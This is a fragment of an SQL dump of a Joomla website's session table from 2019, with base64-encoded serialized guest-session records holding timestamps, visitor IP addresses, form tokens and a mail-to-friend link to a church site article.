(0x3739316130363833306561326136616138643430393632636130313362373932, 0, 1, 1569377880, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3Nzg4MDtzOjQ6Imxhc3QiO2k6MTU2OTM3Nzg4MDtzOjM6Im5vdyI7aToxNTY5Mzc3ODgwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44OC45MSI7fXM6NToidG9rZW4iO3M6MzI6Ik93eVN2azRBVU5TU2Vaa1pKcVQ2Vm9wOW1UdEFHd3lXIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3739346333373930643761653666616563356463376431306666626539643236, 0, 1, 1569384970, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk2OTtzOjQ6Imxhc3QiO2k6MTU2OTM4NDk2OTtzOjM6Im5vdyI7aToxNTY5Mzg0OTY5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJ1cmQ5dzE4WjNWcWRwM1Q0TGRvVGoxM0JaaURydzBWRCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3762336432323062366437386163623866393633356232343861383331623434, 0, 1, 1569381687, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTY4NztzOjQ6Imxhc3QiO2k6MTU2OTM4MTY4NztzOjM6Im5vdyI7aToxNTY5MzgxNjg3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE5OC41OC45Ni4yMTIiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3762373537653939383838626166633230396266613430396637646466396264, 0, 1, 1569381282, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTI4MjtzOjQ6Imxhc3QiO2k6MTU2OTM4MTI4MjtzOjM6Im5vdyI7aToxNTY5MzgxMjgyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjQ2LjIyOS4xNjguMTI5Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3764333566643133363165323639323662636364636134373863313232343666, 0, 1, 1569382190, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjE4OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjE4OTtzOjM6Im5vdyI7aToxNTY5MzgyMTg5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJIMEF6ZXhzaXNubm5Ka1ZkdlpCQ2NTZ091NmJUMDdybSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3764666162643830333665656433383634396231656130313132386137303139, 0, 1, 1569378875, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3ODg3NTtzOjQ6Imxhc3QiO2k6MTU2OTM3ODg3NTtzOjM6Im5vdyI7aToxNTY5Mzc4ODc1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE5Mi4xNTUuOTQuNDMiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3765646331666438653730663661636364323064626534343366643637303530, 0, 1, 1569384316, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDMxNTtzOjQ6Imxhc3QiO2k6MTU2OTM4NDMxNTtzOjM6Im5vdyI7aToxNTY5Mzg0MzE1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjIxNS41MSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3766343263333733633033653937393731356134393634623962623631616533, 0, 1, 1569377486, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzQ4NjtzOjQ6Imxhc3QiO2k6MTU2OTM3NzQ4NjtzOjM6Im5vdyI7aToxNTY5Mzc3NDg2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3830366161373730393232646634373839643461336535393637323639373236, 0, 1, 1569384945, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk0NDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDk0NDtzOjM6Im5vdyI7aToxNTY5Mzg0OTQ0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJvdGgzSHlnZ1d3SmhDeWt5cklSa1Y0MWp1YmIzbENGYiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3831323733353833366137646664386632326236363333363631623664303033, 0, 1, 1569382315, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjMxNTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjMxNTtzOjM6Im5vdyI7aToxNTY5MzgyMzE1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3832353632376432366334366436346331303133623764336362326538366432, 0, 1, 1569381542, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTU0MTtzOjQ6Imxhc3QiO2k6MTU2OTM4MTU0MTtzOjM6Im5vdyI7aToxNTY5MzgxNTQxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE3My4yMzIuMjQyLjk4Ijt9czo1OiJ0b2tlbiI7czozMjoiZHBuNzNVOTM0NUJHZm12bXZDMXFycUNjcTdCWkw0UFAiO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3832656232646662316563393239373964383365623334636362363836646366, 0, 1, 1569384918, 'joomla|s:1168:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDkxNztzOjQ6Imxhc3QiO2k6MTU2OTM4NDkxNztzOjM6Im5vdyI7aToxNTY5Mzg0OTE3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJCWEFqM2c5SlNaMkZ1b0JDRk1jTzlmcndSZUpGd0VCYyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjY6Im1haWx0byI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NDoiZm9ybSI7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJkYXRhIjthOjU6e3M6NDoibGluayI7czo0MToiZDk2NTgzYzI4NGYyZTgzZTg5ZjI2ODE1YjFiN2NkNTVhNjcxN2E4MS8iO3M6Njoic2VuZGVyIjtzOjA6IiI7czo3OiJzdWJqZWN0IjtzOjA6IiI7czo5OiJlbWFpbGZyb20iO3M6MDoiIjtzOjc6ImVtYWlsdG8iO3M6MDoiIjt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3833313839636334616536623462616335313139616239623531333164326538, 0, 1, 1569378939, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3ODkzOTtzOjQ6Imxhc3QiO2k6MTU2OTM3ODkzOTtzOjM6Im5vdyI7aToxNTY5Mzc4OTM5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3833366462663334326434373061653235323061663737353138353238613234, 0, 1, 1569383812, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aTozO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4Mzc0MDtzOjQ6Imxhc3QiO2k6MTU2OTM4Mzc1MDtzOjM6Im5vdyI7aToxNTY5MzgzODExO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTU6IjEwNy4xNzIuMjMyLjE4OCI7fXM6NToidG9rZW4iO3M6MzI6ImhlMWVGREY2aTJXeWE2NFZIVWkzY21PSlBoTEhVeVJsIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3834633763656633623066323232663638656239343565633461663432346565, 0, 1, 1569382282, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjI4MjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjI4MjtzOjM6Im5vdyI7aToxNTY5MzgyMjgyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3835363234633634383138303864343630333762633439643331336337373631, 0, 1, 1569377846, 'joomla|s:1272:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3Nzg0NTtzOjQ6Imxhc3QiO2k6MTU2OTM3Nzg0NTtzOjM6Im5vdyI7aToxNTY5Mzc3ODQ1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44My40MCI7fXM6NToidG9rZW4iO3M6MzI6IllMNHY0NXl4NmNtY2U3WThGTXBpRjRwcndDc1U2Y2ZBIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiYTc2ZWM5Y2Q4Njg5NDIxYjRiNDQxZmRmZjhiMDVkOWUzY2RlZTMzMCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjE2ODoiaHR0cHM6Ly93d3cubGlmZW9hc2lzaW50ZXJuYXRpb25hbGNodXJjaC5vcmcvZGl2aW5lLWFnZW5kYS9pdGVtLzUyLWlmLXlvdS1hcmUtd2lsbGluZy1hbmQtb2JlZGllbnQteW91LXNoYWxsLWVhdC10aGUtZ29vZC1vZi10aGUtbGFuZC1mcm9tLW91ci1mYXRoZXItcy1oZWFydC0xOC0wNi0yMDE3IjtzOjY6ImV4cGlyeSI7aToxNTY5Mzc3ODQ2O319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, '');
INSERT INTO `y57u5_session` (`session_id`, `client_id`, `guest`, `time`, `data`, `userid`, `username`) VALUES
(0x3835383638333232623561373463343939393965336163353366653835353462, 0, 1, 1569382140, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjEzOTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjEzOTtzOjM6Im5vdyI7aToxNTY5MzgyMTM5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
